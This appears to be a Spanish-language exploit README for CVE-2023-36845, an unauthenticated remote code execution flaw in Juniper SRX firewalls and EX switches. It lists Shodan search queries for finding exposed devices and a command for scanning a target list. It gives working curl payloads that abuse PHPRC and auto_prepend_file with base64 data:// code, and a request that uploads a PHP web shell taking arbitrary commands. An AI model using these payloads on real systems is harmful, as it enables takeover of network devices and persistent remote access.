
Exploit para CVE-2023-36845, una vulnerabilidad de manipulación de variables de entorno PHP en Juniper SRX/EX, que permite la ejecución remota de código no autenticada mediante solicitudes HTTP manipuladas.
CVE-2023-36845 representa una vulnerabilidad notable de manipulación de variables de entorno PHP que afecta a los firewalls Juniper SRX y switches EX. Aunque Juniper ha categorizado esta vulnerabilidad como de gravedad media, en este artículo explicaremos cómo esta única vulnerabilidad puede ser aprovechada para ejecución remota de código no autenticada.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
Detección
python3 CVE-2023-36845.py -f targets.txt -o output.txt
Es factible utilizar cualquier envoltorio de protocolo junto con auto_prepend_file. La opción más adecuada para esta operación es el protocolo data://, que permite proporcionar el "archivo secundario" en línea. A continuación se muestra una representación sofisticada de este exploit, ejecutando el código <? phpinfo(); ?> incrustado dentro del esquema data://:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
Ejecutar el comando whoami
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
Subir un archivo
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| Parámetro | Descripción | Tipo |
|---|---|---|
| --file / -f | Archivo de objetivos de entrada | Archivo |
| -o | Archivo de salida | Archivo |